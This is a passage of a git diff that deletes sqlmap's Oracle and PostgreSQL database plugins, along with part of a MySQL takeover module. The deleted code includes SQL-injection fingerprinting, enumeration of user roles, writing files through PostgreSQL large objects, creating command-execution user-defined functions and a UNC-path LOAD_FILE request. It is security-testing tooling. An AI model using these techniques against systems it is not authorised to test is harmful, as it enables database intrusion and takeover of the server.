Backend.isOs(OS.WINDOWS): - _ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_") - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "dll" - else: - _ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_") - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "so" - - def udfCreateFromSharedLib(self, udf, inpRet): - if udf in self.udfToCreate: - logger.info("creating UDF '%s' from the binary UDF file" % udf) - - ret = inpRet["return"] - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html - inject.goStacked("DROP FUNCTION %s" % udf) - inject.goStacked("CREATE FUNCTION %s RETURNS %s SONAME '%s.%s'" % (udf, ret, self.udfSharedLibName, self.udfSharedLibExt)) - - self.createdUdf.add(udf) - else: - logger.debug("keeping existing UDF '%s' as requested" % udf) - - def uncPathRequest(self): - if not isStackingAvailable(): - query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - - Request.queryPage(payload) - else: - inject.goStacked("SELECT LOAD_FILE('%s')" % self.uncPath, silent=True) diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py deleted file mode 100644 index 05e1872a..00000000 --- a/plugins/dbms/oracle/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import ORACLE_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.oracle.enumeration import Enumeration -from plugins.dbms.oracle.filesystem import Filesystem -from plugins.dbms.oracle.fingerprint import Fingerprint -from plugins.dbms.oracle.syntax import Syntax -from plugins.dbms.oracle.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class OracleMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Oracle methods - """ - - def __init__(self): - self.excludeDbsList = ORACLE_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.ORACLE] = Syntax.escape diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py deleted file mode 100644 index 8b821ba8..00000000 --- a/plugins/dbms/oracle/connector.py +++ /dev/null @@ -1,80 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import cx_Oracle -except ImportError: - pass - -import logging -import os - -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -os.environ["NLS_LANG"] = ".AL32UTF8" - -class Connector(GenericConnector): - """ - Homepage: http://cx-oracle.sourceforge.net/ - User guide: http://cx-oracle.sourceforge.net/README.txt - API: http://cx-oracle.sourceforge.net/html/index.html - License: http://cx-oracle.sourceforge.net/LICENSE.txt - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - self.__dsn = cx_Oracle.makedsn(self.hostname, self.port, self.db) - self.__dsn = utf8encode(self.__dsn) - self.user = utf8encode(self.user) - self.password = utf8encode(self.password) - - try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA) - logger.info("successfully connected as SYSDBA") - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError): - try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password) - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), msg: - raise SqlmapConnectionException(msg) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except cx_Oracle.InterfaceError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(utf8encode(query)) - retVal = True - except cx_Oracle.DatabaseError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - return retVal diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py deleted file mode 100644 index 030d46fb..00000000 --- a/plugins/dbms/oracle/enumeration.py +++ /dev/null @@ -1,166 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import getLimitRange -from lib.core.common import isAdminFromPrivileges -from lib.core.common import isInferenceAvailable -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapNoneDataException -from lib.request import inject -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getRoles(self, query2=False): - infoMsg = "fetching database users roles" - - rootQuery = queries[Backend.getIdentifiedDbms()].roles - - if conf.user == "CU": - infoMsg += " for current user" - conf.user = self.getCurrentUser() - - logger.info(infoMsg) - - # Set containing the list of DBMS administrators - areAdmins = set() - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if query2: - query = rootQuery.inband.query2 - condition = rootQuery.inband.condition2 - else: - query = rootQuery.inband.query - condition = rootQuery.inband.condition - - if conf.user: - users = conf.user.split(",") - query += " WHERE " - query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) - - values = inject.getValue(query, blind=False, time=False) - - if not values and not query2: - infoMsg = "trying with table USER_ROLE_PRIVS" - logger.info(infoMsg) - - return self.getRoles(query2=True) - - if not isNoneValue(values): - for value in values: - user = None - roles = set() - - for count in xrange(0, len(value)): - # The first column is always the username - if count == 0: - user = value[count] - - # The other columns are the roles - else: - role = value[count] - - # In Oracle we get the list of roles as string - roles.add(role) - - if user in kb.data.cachedUsersRoles: - kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user])) - else: - kb.data.cachedUsersRoles[user] = list(roles) - - if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: - if conf.user: - users = conf.user.split(",") - else: - if not len(kb.data.cachedUsers): - users = self.getUsers() - else: - users = kb.data.cachedUsers - - retrievedUsers = set() - - for user in users: - unescapedUser = None - - if user in retrievedUsers: - continue - - infoMsg = "fetching number of roles " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if unescapedUser: - queryUser = unescapedUser - else: - queryUser = user - - if query2: - query = rootQuery.blind.count2 % queryUser - else: - query = rootQuery.blind.count % queryUser - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - if count != 0 and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) - - return self.getPrivileges(query2=True) - - warnMsg = "unable to retrieve the number of " - warnMsg += "roles for user '%s'" % user - logger.warn(warnMsg) - continue - - infoMsg = "fetching roles for user '%s'" % user - logger.info(infoMsg) - - roles = set() - - indexRange = getLimitRange(count, plusOne=True) - - for index in indexRange: - if query2: - query = rootQuery.blind.query2 % (queryUser, index) - else: - query = rootQuery.blind.query % (queryUser, index) - role = inject.getValue(query, union=False, error=False) - - # In Oracle we get the list of roles as string - roles.add(role) - - if roles: - kb.data.cachedUsersRoles[user] = list(roles) - else: - warnMsg = "unable to retrieve the roles " - warnMsg += "for user '%s'" % user - logger.warn(warnMsg) - - retrievedUsers.add(user) - - if not kb.data.cachedUsersRoles: - errMsg = "unable to retrieve the roles " - errMsg += "for the database users" - raise SqlmapNoneDataException(errMsg) - - for user, privileges in kb.data.cachedUsersRoles.items(): - if isAdminFromPrivileges(privileges): - areAdmins.add(user) - - return kb.data.cachedUsersRoles, areAdmins diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py deleted file mode 100644 index 6d054329..00000000 --- a/plugins/dbms/oracle/filesystem.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "File system read access not yet implemented for " - errMsg += "Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "File system write access not yet implemented for " - errMsg += "Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py deleted file mode 100644 index a5321dbc..00000000 --- a/plugins/dbms/oracle/fingerprint.py +++ /dev/null @@ -1,125 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import ORACLE_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.ORACLE) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.ORACLE - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or (conf.dbms or "").lower() in ORACLE_ALIASES): - setDbms(DBMS.ORACLE) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.ORACLE - logger.info(infoMsg) - - # NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting - # directly to the Oracle database - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM") - - if result: - infoMsg = "confirming %s" % DBMS.ORACLE - logger.info(infoMsg) - - # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does - # not work connecting directly to the Oracle database - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) - - return False - - setDbms(DBMS.ORACLE) - - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.ORACLE - logger.info(infoMsg) - - for version in ("11i", "10g", "9i", "8i"): - number = int(re.search("([\d]+)", version).group(1)) - output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) - - if output: - Backend.setVersion(version) - break - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - if conf.db: - conf.db = conf.db.upper() - - if conf.tbl: - conf.tbl = conf.tbl.upper() diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py deleted file mode 100644 index c30e68ea..00000000 --- a/plugins/dbms/oracle/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("%s(%d)" % ("CHR" if ord(value[i]) < 256 else "NCHR", ord(value[i])) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py deleted file mode 100644 index 41aceb10..00000000 --- a/plugins/dbms/oracle/takeover.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "Operating system command execution functionality not " - errMsg += "yet implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "Operating system shell functionality not yet " - errMsg += "implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "Operating system out-of-band control functionality " - errMsg += "not yet implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "One click operating system out-of-band control " - errMsg += "functionality not yet implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py deleted file mode 100644 index ac082e05..00000000 --- a/plugins/dbms/postgresql/__init__.py +++ /dev/null @@ -1,40 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import PGSQL_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.postgresql.enumeration import Enumeration -from plugins.dbms.postgresql.filesystem import Filesystem -from plugins.dbms.postgresql.fingerprint import Fingerprint -from plugins.dbms.postgresql.syntax import Syntax -from plugins.dbms.postgresql.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines PostgreSQL methods - """ - - def __init__(self): - self.excludeDbsList = PGSQL_SYSTEM_DBS - self.sysUdfs = { - # UDF name: UDF parameters' input data-type and return data-type - "sys_exec": { "input": ["text"], "return": "int4" }, - "sys_eval": { "input": ["text"], "return": "text" }, - "sys_bineval": { "input": ["text"], "return": "int4" }, - "sys_fileread": { "input": ["text"], "return": "text" } - } - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.PGSQL] = Syntax.escape diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py deleted file mode 100644 index 4f4c218e..00000000 --- a/plugins/dbms/postgresql/connector.py +++ /dev/null @@ -1,75 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import psycopg2 - import psycopg2.extensions - psycopg2.extensions.register_type(psycopg2.extensions.UNICODE) - psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY) -except ImportError: - pass - -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://initd.org/psycopg/ - User guide: http://initd.org/psycopg/docs/ - API: http://initd.org/psycopg/docs/genindex.html - Debian package: python-psycopg2 - License: GPL - - Possible connectors: http://wiki.python.org/moin/PostgreSQL - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port) - except psycopg2.OperationalError, msg: - raise SqlmapConnectionException(msg) - - self.connector.set_client_encoding('UNICODE') - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except psycopg2.ProgrammingError, msg: - logger.warn(msg) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except (psycopg2.OperationalError, psycopg2.ProgrammingError), msg: - logger.warn(("(remote) %s" % msg).strip()) - except psycopg2.InternalError, msg: - raise SqlmapConnectionException(msg) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - return retVal diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py deleted file mode 100644 index b8cb078a..00000000 --- a/plugins/dbms/postgresql/enumeration.py +++ /dev/null @@ -1,18 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger - -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getHostname(self): - warnMsg = "on PostgreSQL it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py deleted file mode 100644 index 2a04da9d..00000000 --- a/plugins/dbms/postgresql/filesystem.py +++ /dev/null @@ -1,80 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import randomInt -from lib.core.data import logger -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.settings import LOBLKSIZE -from lib.request import inject -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - self.oid = None - self.page = None - - GenericFilesystem.__init__(self) - - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - self.initEnv() - - return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread") - - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): - errMsg = "PostgreSQL does not support file upload with UNION " - errMsg += "query SQL injection technique" - raise SqlmapUnsupportedFeatureException(errMsg) - - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - wFileSize = os.path.getsize(wFile) - content = open(wFile, "rb").read() - - self.oid = randomInt() - self.page = 0 - - self.createSupportTbl(self.fileTblName, self.tblField, "text") - - debugMsg = "create a new OID for a large object, it implicitly " - debugMsg += "adds an entry in the large objects system table" - logger.debug(debugMsg) - - # References: - # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html - # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html - - inject.goStacked("SELECT lo_unlink(%d)" % self.oid) - inject.goStacked("SELECT lo_create(%d)" % self.oid) - inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid) - - for offset in xrange(0, wFileSize, LOBLKSIZE): - fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False) - sqlQueries = self.fileToSqlQueries(fcEncodedList) - - for sqlQuery in sqlQueries: - inject.goStacked(sqlQuery) - - inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName)) - inject.goStacked("DELETE FROM %s" % self.fileTblName) - - self.page += 1 - - debugMsg = "exporting the OID %s file content to " % fileType - debugMsg += "file '%s'" % dFile - logger.debug(debugMsg) - - inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True) - - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - inject.goStacked("SELECT lo_unlink(%d)" % self.oid) - - return written diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py deleted file mode 100644 index 6b371e19..00000000 --- a/plugins/dbms/postgresql/fingerprint.py +++ /dev/null @@ -1,171 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import PGSQL_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.PGSQL) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.PGSQL - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - - * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3) - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or (conf.dbms or "").lower() in PGSQL_ALIASES): - setDbms(DBMS.PGSQL) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.PGSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("[RANDNUM]::int=[RANDNUM]") - - if result: - infoMsg = "confirming %s" % DBMS.PGSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) - - return False - - setDbms(DBMS.PGSQL) - - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.PGSQL - logger.info(infoMsg) - - if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): - Backend.setVersion(">= 9.1.0") - elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): - Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) - elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): - Backend.setVersionList([">= 8.4.0", "< 9.0.0"]) - elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"): - Backend.setVersionList([">= 8.3.0", "< 8.4.0"]) - elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"): - Backend.setVersionList([">= 8.2.0", "< 8.3.0"]) - elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"): - Backend.setVersionList([">= 8.1.0", "< 8.2.0"]) - elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"): - Backend.setVersionList([">= 8.0.0", "< 8.1.0"]) - elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"): - Backend.setVersionList([">= 7.4.0", "< 8.0.0"]) - elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"): - Backend.setVersionList([">= 7.3.0", "< 7.4.0"]) - elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"): - Backend.setVersionList([">= 7.2.0", "< 7.3.0"]) - elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"): - Backend.setVersionList([">= 7.1.0", "< 7.2.0"]) - elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"): - Backend.setVersionList([">= 7.0.0", "< 7.1.0"]) - elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"): - Backend.setVersionList([">= 6.5.0", "< 6.5.3"]) - elif inject.checkBooleanExpression("VERSION()=VERSION()"): - Backend.setVersionList([">= 6.4.0", "< 6.5.0"]) - elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"): - Backend.setVersionList([">= 6.3.0", "< 6.4.0"]) - elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"): - Backend.setVersionList([">= 6.2.0", "< 6.3.0"]) - else: - Backend.setVersion("< 6.2.0") - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs(): - return - - infoMsg = "fingerprinting the back-end DBMS operating system" - logger.info(infoMsg) - - self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)") - inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()")) - - # Windows executables should always have ' Visual C++' or ' mingw' - # patterns within the banner - osWindows = (" Visual C++", "mingw") - - for osPattern in osWindows: - query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%" + osPattern + "%')>0" - - if inject.checkBooleanExpression(query): - Backend.setOs(OS.WINDOWS) - - break - - if Backend.getOs() is None: - Backend.setOs(OS.LINUX) - - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - logger.info(infoMsg) - - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py deleted file mode 100644 index 5aeb83d2..00000000 --- a/plugins/dbms/postgresql/syntax.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - Note: PostgreSQL has a general problem with concenation operator (||) precedence (hence the parentheses enclosing) - e.g. SELECT 1 WHERE 'a'!='a'||'b' will trigger error ("argument of WHERE must be type boolean, not type text") - - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar' - """ - - def escaper(value): - return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py deleted file mode 100644 index 401f92a6..00000000 --- a/plugins/dbms/postgresql/takeover.py +++ /dev/null @@ -1,104 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import Backend -from lib.core.common import checkFile -from lib.core.common import decloakToTemp -from lib.core.common import randomStr -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import OS -from lib.core.exception import SqlmapSystemException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def udfSetRemotePath(self): - # On Windows - if Backend.isOs(OS.WINDOWS): - # The DLL can be in any folder where postgres user has - # read/write/execute access is valid - # NOTE: by not specifing any path, it will save into the - # data directory, on PostgreSQL 8.3 it is - # C:\Program Files\PostgreSQL\8.3\data. - self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) - - # On Linux - else: - # The SO can be in any folder where postgres user has - # read/write/execute access is valid - self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) - - def udfSetLocalPaths(self): - self.udfLocalFile = paths.SQLMAP_UDF_PATH - self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) - - self.getVersionFromBanner() - - banVer = kb.bannerFp["dbmsVersion"] - - if banVer >= "9.4": - majorVer = "9.4" - elif banVer >= "9.3": - 